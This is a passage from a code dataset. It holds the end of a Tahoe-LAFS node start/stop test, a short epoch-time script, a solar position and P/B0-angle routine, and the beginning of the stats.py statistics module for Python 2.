self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(PORTNUMFILE)
d.addCallback(lambda res: self.poll(_node_has_started))
def _started(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE))
# rm this so we can detect when the second incarnation is ready
os.unlink(PORTNUMFILE)
return self.run_bintahoe(["--quiet", "restart", c1])
d.addCallback(_started)
def _cb3(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
d.addCallback(_cb3)
# again, the second incarnation of the node might not be ready yet,
# so poll until it is
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
# itself before we get a chance too, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE), (TWISTD_PID_FILE, os.listdir(os.path.dirname(TWISTD_PID_FILE))))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
def _cb4(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
# the parent has exited by now
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent was supposed to poll and wait until it sees
# twistd.pid go away before it exits, so twistd.pid should be
# gone by now.
self.failIf(os.path.exists(TWISTD_PID_FILE))
d.addCallback(_cb4)
def _remove_hotline(res):
os.unlink(HOTLINE_FILE)
return res
d.addBoth(_remove_hotline)
return d
def test_baddir(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_baddir")
fileutil.make_dirs(basedir)
d = self.run_bintahoe(["--quiet", "start", "--basedir", basedir])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 1)
self.failUnless("does not look like a node directory" in err, err)
d.addCallback(_cb)
def _then_stop_it(res):
return self.run_bintahoe(["--quiet", "stop", "--basedir", basedir])
d.addCallback(_then_stop_it)
def _cb2(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 2)
self.failUnless("does not look like a running node directory" in err)
d.addCallback(_cb2)
def _then_start_in_bogus_basedir(res):
not_a_dir = os.path.join(basedir, "bogus")
return self.run_bintahoe(["--quiet", "start", "--basedir", not_a_dir])
d.addCallback(_then_start_in_bogus_basedir)
def _cb3(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 1)
self.failUnless("does not look like a directory at all" in err, err)
d.addCallback(_cb3)
return d
def test_keygen(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_keygen")
c1 = os.path.join(basedir, "c1")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
KEYGEN_FURL_FILE = os.path.join(c1, "key_generator.furl")
d = self.run_bintahoe(["--quiet", "create-key-generator", "--basedir", c1])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0)
d.addCallback(_cb)
def _start(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_start)
def _cb2(res):
out, err, rc_or_sig = res
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(KEYGEN_FURL_FILE)
d.addCallback(lambda res: self.poll(_node_has_started))
def _started(res):
self.failUnless(os.path.exists(TWISTD_PID_FILE))
# rm this so we can detect when the second incarnation is ready
os.unlink(KEYGEN_FURL_FILE)
return self.run_bintahoe(["--quiet", "restart", c1])
d.addCallback(_started)
def _cb3(res):
out, err, rc_or_sig = res
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
d.addCallback(_cb3)
# again, the second incarnation of the node might not be ready yet,
# so poll until it is
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
# itself before we get a chance to, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
self.failUnless(os.path.exists(TWISTD_PID_FILE))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
def _cb4(res):
out, err, rc_or_sig = res
# the parent has exited by now
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent was supposed to poll and wait until it sees
# twistd.pid go away before it exits, so twistd.pid should be
# gone by now.
self.failIf(os.path.exists(TWISTD_PID_FILE))
d.addCallback(_cb4)
return d
|
drewp/tahoe-lafs
|
src/allmydata/test/test_runner.py
|
Python
|
gpl-2.0
| 31,464
|
import datetime, time
print time.mktime(datetime.datetime.now().timetuple()) * 1000
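# Note: time.mktime() interprets the struct_time as local time and returns
# seconds since the epoch as a float; multiplying by 1000 gives milliseconds.
# Because timetuple() discards microseconds, the result has only whole-second
# precision.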
|
spicyramen/sipLocator
|
tools/testTimeEpoch.py
|
Python
|
gpl-2.0
| 85
|
from math import sin, cos, pi, atan2, atan, asin, tan
def sun_pos(dd):
'''This routine is a truncated version of Newcomb's Sun and
is designed to give apparent angular coordinates (T.E.D) to a
precision of one second of time.
Translated from SSW (IDL) routine of the same name
'''
dtor = pi/180.
# Form time in Julian centuries from 1900.0
t = dd/36525.0
# Form sun's mean longitude
l = (279.696678+((36000.768925*t) % 360.0))*3600.0
# Allow for ellipticity of the orbit (equation of centre)
# using the Earth's mean anomaly ME
me = 358.475844 + ((35999.049750*t) % 360.0)
ellcor = (6910.1 - 17.2*t)*sin(me*dtor) + 72.3*sin(2.0*me*dtor)
l = l + ellcor
# Allow for the Venus perturbations using the mean anomaly of Venus MV
mv = 212.603219 + ((58517.803875*t) % 360.0)
vencorr = 4.8 * cos((299.1017 + mv - me)*dtor) + \
5.5 * cos((148.3133 + 2.0 * mv - 2.0 * me )*dtor) + \
2.5 * cos((315.9433 + 2.0 * mv - 3.0 * me )*dtor) + \
1.6 * cos((345.2533 + 3.0 * mv - 4.0 * me )*dtor) + \
1.0 * cos((318.15 + 3.0 * mv - 5.0 * me )*dtor)
l = l + vencorr
# Allow for the Mars perturbations using the mean anomaly of Mars MM
mm = 319.529425 + (( 19139.858500 * t) % 360.0 )
marscorr = 2.0 * cos((343.8883 - 2.0 * mm + 2.0 * me)*dtor ) + \
1.8 * cos((200.4017 - 2.0 * mm + me)*dtor)
l = l + marscorr
# Allow for the Jupiter perturbations using the mean anomaly of
# Jupiter MJ
mj = 225.328328 + (( 3034.6920239 * t) % 360.0 )
jupcorr = 7.2 * cos(( 179.5317 - mj + me )*dtor) + \
2.6 * cos((263.2167 - mj )*dtor) + \
2.7 * cos(( 87.1450 - 2.0 * mj + 2.0 * me)*dtor) + \
1.6 * cos((109.4933 - 2.0 * mj + me )*dtor)
l = l + jupcorr
# Allow for the Moon's perturbations using the mean elongation of
# the Moon from the Sun D
d = 350.7376814 + (( 445267.11422 * t) % 360.0 )
mooncorr = 6.5 * sin(d*dtor)
l = l + mooncorr
# Allow for long period terms
longterm = + 6.4 * sin(( 231.19 + 20.20 * t )*dtor)
l = l + longterm
l = ( l + 2592000.0) % 1296000.0
longmed = l/3600.0
# Allow for Aberration
l = l - 20.5
# Allow for Nutation using the longitude of the Moon's mean node OMEGA
omega = 259.183275 - (( 1934.142008 * t ) % 360.0 )
l = l - 17.2 * sin(omega*dtor)
# Form the True Obliquity
oblt = 23.452294 - 0.0130125*t + (9.2*cos(omega*dtor))/3600.0
# Form Right Ascension and Declination
l = l/3600.0
ra = atan2( sin(l*dtor) * cos(oblt*dtor) , cos(l*dtor) ) / dtor
if ra < 0.0:
ra += 360.0
dec = asin(sin(l*dtor) * sin(oblt*dtor)) / dtor
return longmed, ra, dec, l, oblt
def get_pb0r(mjd,arcsec=False):
'''Given a modified Julian date, return the solar P-angle (degrees),
B0-angle (degrees), and solar radius (arcmin, or if arcsec=True,
return solar radius in arcsec)
Translated from SSW (IDL) routine pb0r().
'''
dtor = pi/180.
de = mjd-15019.5 # Parameters defined starting at noon on 1899/12/31.
#;---------------------------------------------------------------------------
#; get the longitude of the sun etc.
#;---------------------------------------------------------------------------
longmed, ra, dec, appl, oblt = sun_pos(de)
#;---------------------------------------------------------------------------
#; form aberrated longitude
#;---------------------------------------------------------------------------
lmbda = longmed - (20.5/3600.0)
#;---------------------------------------------------------------------------
#; form longitude of ascending node of sun's equator on ecliptic
#;---------------------------------------------------------------------------
node = 73.666666 + (50.25/3600.0)*( (de/365.25) + 50.0 )
arg = lmbda - node
#;---------------------------------------------------------------------------
#; calculate P, the position angle of the pole
#;---------------------------------------------------------------------------
p = (atan(-tan(oblt*dtor) * cos(appl*dtor)) +
atan( -0.12722 * cos(arg*dtor))) / dtor
#;---------------------------------------------------------------------------
#; ... and B0 the tilt of the axis
#;---------------------------------------------------------------------------
b = asin( 0.12620 * sin(arg*dtor) ) / dtor
#;---------------------------------------------------------------------------
#; ... and the semi-diameter
#;
#;
#; Form the mean anomalies of Venus(MV),Earth(ME),Mars(MM),Jupiter(MJ)
#; and the mean elongation of the Moon from the Sun(D).
#;
#;---------------------------------------------------------------------------
t = de/36525.0
mv = 212.6 + ( (58517.80 * t) % 360.0 )
me = 358.476 + ( (35999.0498 * t) % 360.0 )
mm = 319.5 + ( (19139.86 * t) % 360.0 )
mj = 225.3 + ( ( 3034.69 * t) % 360.0 )
d = 350.7 + ( (445267.11 * t) % 360.0 )
#;---------------------------------------------------------------------------
#; Form the geocentric distance(r) and semi-diameter(sd)
#;---------------------------------------------------------------------------
r = 1.000141 - (0.016748 - 0.0000418*t)*cos(me*dtor) \
- 0.000140 * cos(2.0*me*dtor) \
+ 0.000016 * cos((58.3 + 2.0*mv - 2.0*me)*dtor) \
+ 0.000005 * cos((209.1 + mv - me)*dtor) \
+ 0.000005 * cos((253.8 - 2.0*mm + 2.0*me)*dtor) \
+ 0.000016 * cos(( 89.5 - mj + me)*dtor) \
+ 0.000009 * cos((357.1 - 2.0*mj + 2.0*me)*dtor) \
+ 0.000031 * cos(d*dtor)
sd = (0.2665685/r)*60.0
if arcsec:
return p, b, sd*60.
return p, b, sd
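# Minimal usage sketch (assuming MJD 51544.0 = 2000 January 1.0 UT):
#   p, b, sd = get_pb0r(51544.0)                    # P, B0 in degrees; radius in arcmin
#   p, b, sd_asec = get_pb0r(51544.0, arcsec=True)  # radius in arcsec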
|
dgary50/eovsa
|
sun_pos.py
|
Python
|
gpl-2.0
| 6,047
|
# Copyright (c) 1999-2002 Gary Strangman; All Rights Reserved.
#
# This software is distributable under the terms of the GNU
# General Public License (GPL) v2, the text of which can be found at
# http://www.gnu.org/copyleft/gpl.html. Installing, importing or otherwise
# using this module constitutes acceptance of the terms of this License.
#
# Disclaimer
#
# This software is provided "as-is". There are no expressed or implied
# warranties of any kind, including, but not limited to, the warranties
# of merchantability and fitness for a given application. In no event
# shall Gary Strangman be liable for any direct, indirect, incidental,
# special, exemplary or consequential damages (including, but not limited
# to, loss of use, data or profits, or business interruption) however
# caused and on any theory of liability, whether in contract, strict
# liability or tort (including negligence or otherwise) arising in any way
# out of the use of this software, even if advised of the possibility of
# such damage.
#
# Comments and/or additions are welcome (send e-mail to:
# strang@nmr.mgh.harvard.edu).
#
"""
stats.py module
(Requires pstat.py module.)
#################################################
####### Written by: Gary Strangman ###########
####### Last modified: May 10, 2002 ###########
#################################################
A collection of basic statistical functions for python. The function
names appear below.
IMPORTANT: There are really *3* sets of functions. The first set has an 'l'
prefix, which can be used with list or tuple arguments. The second set has
an 'a' prefix, which can accept NumPy array arguments. These latter
functions are defined only when NumPy is available on the system. The third
type has NO prefix (i.e., has the name that appears below). Functions of
this set are members of a "Dispatch" class, c/o David Ascher. This class
allows different functions to be called depending on the type of the passed
arguments. Thus, stats.mean is a member of the Dispatch class and
stats.mean(range(20)) will call stats.lmean(range(20)) while
stats.mean(Numeric.arange(20)) will call stats.amean(Numeric.arange(20)).
This is a handy way to keep consistent function names when different
argument types require different functions to be called. Having
implemented the Dispatch class, however, means that to get info on
a given function, you must use the REAL function name ... that is
"print stats.lmean.__doc__" or "print stats.amean.__doc__" work fine,
while "print stats.mean.__doc__" will print the doc for the Dispatch
class. NUMPY FUNCTIONS ('a' prefix) generally have more argument options
but should otherwise be consistent with the corresponding list functions.
Disclaimers: The function list is obviously incomplete and, worse, the
functions are not optimized. All functions have been tested (some more
so than others), but they are far from bulletproof. Thus, as with any
free software, no warranty or guarantee is expressed or implied. :-) A
few extra functions that don't appear in the list below can be found by
interested treasure-hunters. These functions don't necessarily have
both list and array versions but were deemed useful.
CENTRAL TENDENCY: geometricmean
harmonicmean
mean
median
medianscore
mode
MOMENTS: moment
variation
skew
kurtosis
skewtest (for Numpy arrays only)
kurtosistest (for Numpy arrays only)
normaltest (for Numpy arrays only)
ALTERED VERSIONS: tmean (for Numpy arrays only)
tvar (for Numpy arrays only)
tmin (for Numpy arrays only)
tmax (for Numpy arrays only)
tstdev (for Numpy arrays only)
tsem (for Numpy arrays only)
describe
FREQUENCY STATS: itemfreq
scoreatpercentile
percentileofscore
histogram
cumfreq
relfreq
VARIABILITY: obrientransform
samplevar
samplestdev
signaltonoise (for Numpy arrays only)
var
stdev
sterr
sem
z
zs
zmap (for Numpy arrays only)
TRIMMING FCNS: threshold (for Numpy arrays only)
trimboth
trim1
round (round all vals to 'n' decimals; Numpy only)
CORRELATION FCNS: covariance (for Numpy arrays only)
correlation (for Numpy arrays only)
paired
pearsonr
spearmanr
pointbiserialr
kendalltau
linregress
INFERENTIAL STATS: ttest_1samp
ttest_ind
ttest_rel
chisquare
ks_2samp
mannwhitneyu
ranksums
wilcoxont
kruskalwallish
friedmanchisquare
PROBABILITY CALCS: chisqprob
erfcc
zprob
ksprob
fprob
betacf
gammln
betai
ANOVA FUNCTIONS: F_oneway
F_value
SUPPORT FUNCTIONS: writecc
incr
sign (for Numpy arrays only)
sum
cumsum
ss
summult
sumdiffsquared
square_of_sums
shellsort
rankdata
outputpairedstats
findwithin
"""
## CHANGE LOG:
## ===========
## 02-11-19 ... fixed attest_ind and attest_rel for div-by-zero Overflows
## 02-05-10 ... fixed lchisqprob indentation (failed when df=even)
## 00-12-28 ... removed aanova() to separate module, fixed licensing to
## match Python License, fixed doc string & imports
## 00-04-13 ... pulled all "global" statements, except from aanova()
## added/fixed lots of documentation, removed io.py dependency
## changed to version 0.5
## 99-11-13 ... added asign() function
## 99-11-01 ... changed version to 0.4 ... enough incremental changes now
## 99-10-25 ... added acovariance and acorrelation functions
## 99-10-10 ... fixed askew/akurtosis to avoid divide-by-zero errors
## added aglm function (crude, but will be improved)
## 99-10-04 ... upgraded acumsum, ass, asummult, asamplevar, avar, etc. to
## all handle lists of 'dimension's and keepdims
## REMOVED ar0, ar2, ar3, ar4 and replaced them with around
## reinserted fixes for abetai to avoid math overflows
## 99-09-05 ... rewrote achisqprob/aerfcc/aksprob/afprob/abetacf/abetai to
## handle multi-dimensional arrays (whew!)
## 99-08-30 ... fixed l/amoment, l/askew, l/akurtosis per D'Agostino (1990)
## added anormaltest per same reference
## re-wrote azprob to calc arrays of probs all at once
## 99-08-22 ... edited attest_ind printing section so arrays could be rounded
## 99-08-19 ... fixed amean and aharmonicmean for non-error(!) overflow on
## short/byte arrays (mean of #s btw 100-300 = -150??)
## 99-08-09 ... fixed asum so that the None case works for Byte arrays
## 99-08-08 ... fixed 7/3 'improvement' to handle t-calcs on N-D arrays
## 99-07-03 ... improved attest_ind, attest_rel (zero-division errortrap)
## 99-06-24 ... fixed bug(?) in attest_ind (n1=a.shape[0])
## 04/11/99 ... added asignaltonoise, athreshold functions, changed all
## max/min in array section to N.maximum/N.minimum,
## fixed square_of_sums to prevent integer overflow
## 04/10/99 ... !!! Changed function name ... sumsquared ==> square_of_sums
## 03/18/99 ... Added ar0, ar2, ar3 and ar4 rounding functions
## 02/28/99 ... Fixed aobrientransform to return an array rather than a list
## 01/15/99 ... Essentially ceased updating list-versions of functions (!!!)
## 01/13/99 ... CHANGED TO VERSION 0.3
## fixed bug in a/lmannwhitneyu p-value calculation
## 12/31/98 ... fixed variable-name bug in ldescribe
## 12/19/98 ... fixed bug in findwithin (fcns needed pstat. prefix)
## 12/16/98 ... changed amedianscore to return float (not array) for 1 score
## 12/14/98 ... added atmin and atmax functions
## removed umath from import line (not needed)
## l/ageometricmean modified to reduce chance of overflows (take
## nth root first, then multiply)
## 12/07/98 ... added __version__variable (now 0.2)
## removed all 'stats.' from anova() fcn
## 12/06/98 ... changed those functions (except shellsort) that altered
## arguments in-place ... cumsum, ranksort, ...
## updated (and fixed some) doc-strings
## 12/01/98 ... added anova() function (requires NumPy)
## incorporated Dispatch class
## 11/12/98 ... added functionality to amean, aharmonicmean, ageometricmean
## added 'asum' function (added functionality to N.add.reduce)
## fixed both moment and amoment (two errors)
## changed name of skewness and askewness to skew and askew
## fixed (a)histogram (which sometimes counted points <lowerlimit)
import pstat # required 3rd party module
import math, string, copy # required python modules
from types import *
__version__ = 0.6
############# DISPATCH CODE ##############
class Dispatch:
"""
The Dispatch class, care of David Ascher, allows different functions to
be called depending on the argument types. This way, there can be one
function name regardless of the argument type. To access function doc
in stats.py module, prefix the function with an 'l' or 'a' for list or
array arguments, respectively. That is, print stats.lmean.__doc__ or
print stats.amean.__doc__ or whatever.
"""
def __init__(self, *tuples):
self._dispatch = {}
for func, types in tuples:
for t in types:
if t in self._dispatch.keys():
raise ValueError, "can't have two dispatches on "+str(t)
self._dispatch[t] = func
self._types = self._dispatch.keys()
def __call__(self, arg1, *args, **kw):
if type(arg1) not in self._types:
raise TypeError, "don't know how to dispatch %s arguments" % type(arg1)
return apply(self._dispatch[type(arg1)], (arg1,) + args, kw)
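# A minimal sketch of how Dispatch is used (the real bindings appear at the
# bottom of the module):
#   mean = Dispatch( (lmean, (ListType, TupleType)), )
#   mean([1, 2, 3])    # type is ListType  -> dispatches to lmean -> 2.0
#   mean((1, 2, 3))    # type is TupleType -> dispatches to lmean -> 2.0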
##########################################################################
######################## LIST-BASED FUNCTIONS ########################
##########################################################################
### Define these regardless
####################################
####### CENTRAL TENDENCY #########
####################################
def lgeometricmean (inlist):
"""
Calculates the geometric mean of the values in the passed list.
That is: n-th root of (x1 * x2 * ... * xn). Assumes a '1D' list.
Usage: lgeometricmean(inlist)
"""
mult = 1.0
one_over_n = 1.0/len(inlist)
for item in inlist:
mult = mult * pow(item,one_over_n)
return mult
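# e.g., lgeometricmean([1, 2, 4]) is the cube root of 1*2*4 = 8, i.e. 2.0
# (up to floating-point rounding).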
def lharmonicmean (inlist):
"""
Calculates the harmonic mean of the values in the passed list.
That is: n / (1/x1 + 1/x2 + ... + 1/xn). Assumes a '1D' list.
Usage: lharmonicmean(inlist)
"""
sum = 0
for item in inlist:
sum = sum + 1.0/item
return len(inlist) / sum
def lmean (inlist):
"""
Returns the arithmetic mean of the values in the passed list.
Assumes a '1D' list, but will function on the 1st dim of an array(!).
Usage: lmean(inlist)
"""
sum = 0
for item in inlist:
sum = sum + item
return sum/float(len(inlist))
def lmedian (inlist,numbins=1000):
"""
Returns the computed median value of a list of numbers, given the
number of bins to use for the histogram (more bins brings the computed value
closer to the median score, default number of bins = 1000). See G.W.
Heiman's Basic Stats (1st Edition), or CRC Probability & Statistics.
Usage: lmedian (inlist, numbins=1000)
"""
(hist, smallest, binsize, extras) = histogram(inlist,numbins) # make histog
cumhist = cumsum(hist) # make cumulative histogram
for i in range(len(cumhist)): # get 1st(!) index holding 50%ile score
if cumhist[i]>=len(inlist)/2.0:
cfbin = i
break
LRL = smallest + binsize*cfbin # get lower real limit of that bin
cfbelow = cumhist[cfbin-1]
freq = float(hist[cfbin]) # frequency IN the 50%ile bin
median = LRL + ((len(inlist)/2.0 - cfbelow)/float(freq))*binsize # median formula
return median
def lmedianscore (inlist):
"""
Returns the 'middle' score of the passed list. If there is an even
number of scores, the mean of the 2 middle scores is returned.
Usage: lmedianscore(inlist)
"""
newlist = copy.deepcopy(inlist)
newlist.sort()
if len(newlist) % 2 == 0: # if even number of scores, average middle 2
index = len(newlist)/2 # integer division correct
median = float(newlist[index] + newlist[index-1]) /2
else:
index = len(newlist)/2 # int division gives the middle value when counting from 0
median = newlist[index]
return median
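# e.g., lmedianscore([7, 1, 5, 3]) sorts to [1, 3, 5, 7] and averages the two
# middle scores: (3 + 5) / 2 = 4.0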
def lmode(inlist):
"""
Returns a list of the modal (most common) score(s) in the passed
list. If there is more than one such score, all are returned. The
bin-count for the mode(s) is also returned.
Usage: lmode(inlist)
Returns: bin-count for mode(s), a list of modal value(s)
"""
scores = pstat.unique(inlist)
scores.sort()
freq = []
for item in scores:
freq.append(inlist.count(item))
maxfreq = max(freq)
mode = []
stillmore = 1
while stillmore:
try:
indx = freq.index(maxfreq)
mode.append(scores[indx])
del freq[indx]
del scores[indx]
except ValueError:
stillmore=0
return maxfreq, mode
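# e.g., lmode([1, 2, 2, 3, 3]) -> (2, [2, 3]): both 2 and 3 appear twice.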
####################################
############ MOMENTS #############
####################################
def lmoment(inlist,moment=1):
"""
Calculates the nth moment about the mean for a sample (defaults to
the 1st moment). Used to calculate coefficients of skewness and kurtosis.
Usage: lmoment(inlist,moment=1)
Returns: appropriate moment (r) from ... 1/n * SUM((inlist(i)-mean)**r)
"""
if moment == 1:
return 0.0
else:
mn = mean(inlist)
n = len(inlist)
s = 0
for x in inlist:
s = s + (x-mn)**moment
return s/float(n)
def lvariation(inlist):
"""
Returns the coefficient of variation, as defined in CRC Standard
Probability and Statistics, p.6.
Usage: lvariation(inlist)
"""
return 100.0*samplestdev(inlist)/float(mean(inlist))
def lskew(inlist):
"""
Returns the skewness of a distribution, as defined in Numerical
Recipes (alternate defn in CRC Standard Probability and Statistics, p.6.)
Usage: lskew(inlist)
"""
return moment(inlist,3)/pow(moment(inlist,2),1.5)
def lkurtosis(inlist):
"""
Returns the kurtosis of a distribution, as defined in Numerical
Recipes (alternate defn in CRC Standard Probability and Statistics, p.6.)
Usage: lkurtosis(inlist)
"""
return moment(inlist,4)/pow(moment(inlist,2),2.0)
def ldescribe(inlist):
"""
Returns some descriptive statistics of the passed list (assumed to be 1D).
Usage: ldescribe(inlist)
Returns: n, mean, standard deviation, skew, kurtosis
"""
n = len(inlist)
mm = (min(inlist),max(inlist))
m = mean(inlist)
sd = stdev(inlist)
sk = skew(inlist)
kurt = kurtosis(inlist)
return n, mm, m, sd, sk, kurt
####################################
####### FREQUENCY STATS ##########
####################################
def litemfreq(inlist):
"""
Returns a list of pairs. Each pair consists of one of the scores in inlist
and its frequency count. Assumes a 1D list is passed.
Usage: litemfreq(inlist)
Returns: a 2D frequency table (col [0:n-1]=scores, col n=frequencies)
"""
scores = pstat.unique(inlist)
scores.sort()
freq = []
for item in scores:
freq.append(inlist.count(item))
return pstat.abut(scores, freq)
def lscoreatpercentile (inlist, percent):
"""
Returns the score at a given percentile relative to the distribution
given by inlist.
Usage: lscoreatpercentile(inlist,percent)
"""
if percent > 1:
print "\nDividing percent>1 by 100 in lscoreatpercentile().\n"
percent = percent / 100.0
targetcf = percent*len(inlist)
h, lrl, binsize, extras = histogram(inlist)
cumhist = cumsum(copy.deepcopy(h))
for i in range(len(cumhist)):
if cumhist[i] >= targetcf:
break
score = binsize * ((targetcf - cumhist[i-1]) / float(h[i])) + (lrl+binsize*i)
return score
def lpercentileofscore (inlist, score,histbins=10,defaultlimits=None):
"""
Returns the percentile value of a score relative to the distribution
given by inlist. Formula depends on the values used to histogram the data(!).
Usage: lpercentileofscore(inlist,score,histbins=10,defaultlimits=None)
"""
h, lrl, binsize, extras = histogram(inlist,histbins,defaultlimits)
cumhist = cumsum(copy.deepcopy(h))
i = int((score - lrl)/float(binsize))
pct = (cumhist[i-1]+((score-(lrl+binsize*i))/float(binsize))*h[i])/float(len(inlist)) * 100
return pct
def lhistogram (inlist,numbins=10,defaultreallimits=None,printextras=0):
"""
Returns (i) a list of histogram bin counts, (ii) the smallest value
of the histogram binning, and (iii) the bin width (the last 2 are not
necessarily integers). Default number of bins is 10. If no sequence object
is given for defaultreallimits, the routine picks (usually non-pretty) bins
spanning all the numbers in the inlist.
Usage: lhistogram (inlist, numbins=10, defaultreallimits=None,suppressoutput=0)
Returns: list of bin values, lowerreallimit, binsize, extrapoints
"""
if (defaultreallimits <> None):
if type(defaultreallimits) not in [ListType,TupleType] or len(defaultreallimits)==1: # only one limit given, assumed to be lower one & upper is calc'd
lowerreallimit = defaultreallimits
upperreallimit = 1.0001 * max(inlist)
else: # assume both limits given
lowerreallimit = defaultreallimits[0]
upperreallimit = defaultreallimits[1]
binsize = (upperreallimit-lowerreallimit)/float(numbins)
else: # no limits given for histogram, both must be calc'd
estbinwidth=(max(inlist)-min(inlist))/float(numbins) + 1 # 1=>cover all
binsize = ((max(inlist)-min(inlist)+estbinwidth))/float(numbins)
lowerreallimit = min(inlist) - binsize/2 #lower real limit,1st bin
bins = [0]*(numbins)
extrapoints = 0
for num in inlist:
try:
if (num-lowerreallimit) < 0:
extrapoints = extrapoints + 1
else:
bintoincrement = int((num-lowerreallimit)/float(binsize))
bins[bintoincrement] = bins[bintoincrement] + 1
except:
extrapoints = extrapoints + 1
if (extrapoints > 0 and printextras == 1):
print '\nPoints outside given histogram range =',extrapoints
return (bins, lowerreallimit, binsize, extrapoints)
def lcumfreq(inlist,numbins=10,defaultreallimits=None):
"""
Returns a cumulative frequency histogram, using the histogram function.
Usage: lcumfreq(inlist,numbins=10,defaultreallimits=None)
Returns: list of cumfreq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(inlist,numbins,defaultreallimits)
cumhist = cumsum(copy.deepcopy(h))
return cumhist,l,b,e
def lrelfreq(inlist,numbins=10,defaultreallimits=None):
"""
Returns a relative frequency histogram, using the histogram function.
Usage: lrelfreq(inlist,numbins=10,defaultreallimits=None)
Returns: list of cumfreq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(inlist,numbins,defaultreallimits)
for i in range(len(h)):
h[i] = h[i]/float(len(inlist))
return h,l,b,e
####################################
##### VARIABILITY FUNCTIONS ######
####################################
def lobrientransform(*args):
"""
Computes a transform on input data (any number of columns). Used to
test for homogeneity of variance prior to running one-way stats. From
Maxwell and Delaney, p.112.
Usage: lobrientransform(*args)
Returns: transformed data for use in an ANOVA
"""
TINY = 1e-10
k = len(args)
n = [0.0]*k
v = [0.0]*k
m = [0.0]*k
nargs = []
for i in range(k):
nargs.append(copy.deepcopy(args[i]))
n[i] = float(len(nargs[i]))
v[i] = var(nargs[i])
m[i] = mean(nargs[i])
for j in range(k):
for i in range(int(n[j])): # n[j] is stored as a float; range() needs an int
t1 = (n[j]-1.5)*n[j]*(nargs[j][i]-m[j])**2
t2 = 0.5*v[j]*(n[j]-1.0)
t3 = (n[j]-1.0)*(n[j]-2.0)
nargs[j][i] = (t1-t2) / float(t3)
check = 1
for j in range(k):
if v[j] - mean(nargs[j]) > TINY:
check = 0
if check <> 1:
raise ValueError, 'Problem in obrientransform.'
else:
return nargs
def lsamplevar (inlist):
"""
Returns the variance of the values in the passed list using
N for the denominator (i.e., DESCRIBES the sample variance only).
Usage: lsamplevar(inlist)
"""
n = len(inlist)
mn = mean(inlist)
deviations = []
for item in inlist:
deviations.append(item-mn)
return ss(deviations)/float(n)
def lsamplestdev (inlist):
"""
Returns the standard deviation of the values in the passed list using
N for the denominator (i.e., DESCRIBES the sample stdev only).
Usage: lsamplestdev(inlist)
"""
return math.sqrt(samplevar(inlist))
def lvar (inlist):
"""
Returns the variance of the values in the passed list using N-1
for the denominator (i.e., for estimating population variance).
Usage: lvar(inlist)
"""
n = len(inlist)
mn = mean(inlist)
deviations = [0]*len(inlist)
for i in range(len(inlist)):
deviations[i] = inlist[i] - mn
return ss(deviations)/float(n-1)
def lstdev (inlist):
"""
Returns the standard deviation of the values in the passed list
using N-1 in the denominator (i.e., to estimate population stdev).
Usage: lstdev(inlist)
"""
return math.sqrt(var(inlist))
def lsterr(inlist):
"""
Returns the standard error of the values in the passed list using N-1
in the denominator (i.e., to estimate population standard error).
Usage: lsterr(inlist)
"""
return stdev(inlist) / float(math.sqrt(len(inlist)))
def lsem (inlist):
"""
Returns the estimated standard error of the mean (sx-bar) of the
values in the passed list. sem = stdev / sqrt(n)
